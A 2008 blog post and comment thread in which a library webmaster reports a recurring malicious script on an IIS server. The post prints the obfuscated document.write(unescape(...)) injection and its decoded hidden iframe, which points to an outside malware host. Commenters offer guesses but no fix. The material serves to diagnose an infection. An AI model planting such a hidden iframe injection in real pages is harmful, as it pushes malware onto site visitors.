Malicious javascript: document.write (unescape
Posted by Mike on 10 January 2008
Some malicious javascript has been appearing on the website of the library I work at:
document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%2F%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E’));
this translates to:
iframe src=”http://mn96.dns.gendistr.info/qualitytest/” height=”0″ width=”0″
The website attempts to offer a virus disguised as ad protection software. I can delete the code but it reappears (likely if/when the server is rebooted). The code goes deep enough to appear in the iisstart.asp, localstart.asp, and browser_detect.asp. Since I’m technically only the webmaster (for a new webpage that isn’t even up yet, don’t ask, I don’t manage the servers or other hardware) with exactly 0 experience with IIS (we have a consultant for that) I’m not sure where to go from here.
We’re running IIS 5.0 and I, for the life of me, can’t figure what item (if any) allows the replication of the code. Any help would be much appreciated.
P.S.: To make matters worse the wwwroot folder is clogged with sh*ttons of legacy files that no-one needs/uses.
MasterBomb said
Seems u need a got a trojan virus. Try search McAfee Site Advisor for iframe trojan or something like that…. Or better try an Apache server it has a high security.
Mike said
Yeah, we figure the same thing. Except Trend Micro (House Call, and the Enterprise stuff) can’t find a damned thing and I have yet to find any solutions online. Indeed, Apache is quality (I run xampp locally as a test server), but I doubt we’ll move to it. Furthermore even those discussions on the obfuscated JavaScript iframe hacks that I can find don’t mention anything about the code replicating on a server reboot, and the major appearance of the hack (ca. July ‘07) indicated that it was directed at index files, not the entire root folder (and every bit of web related code there, .js .htm(l), .asp files).
Mr. Obvious said
It’s a disguised htm or html file
around 20kb to 23 kb..
John said
I’m having the same problems on some sites I’ve designed. I have no clue how it’s getting there or how to make it stop. The sites I had it on was hosted with Apache.
tin said
how to decode document.unescape ?
please help me my website was infected by unknown code.
used said
same problem here what to do
Mike said
Unfortunately, we never really solved the problem. We had a script that would copy clean files over the infected ones every time the server rebooted. Our server ended up dying a week or two ago so the problem is now moot.
Alex said
my sites with IXWebhosting company, they are infected too. I chatted with the help desk, they asked me to open a ticket
I cleaned them manually rather that waiting for them. I hope they have anti viruses installed in there system.
Mike said
It is a tenacious little pain in the ass. We never really solved it/removed it outright but our server ended up dying and we got a new one…that certainly solved the problem.